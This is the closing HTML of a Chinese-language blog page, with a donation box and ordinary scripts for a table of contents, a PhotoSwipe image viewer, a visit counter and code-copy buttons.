    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->

<!-- ClickBoom1 -->

<script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script>

<script src="/js/clickBoom1.js"></script>


<!-- ClickBoom2 -->

<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>


<!-- CanvasBackground -->


    
  </div>
</body>

</html>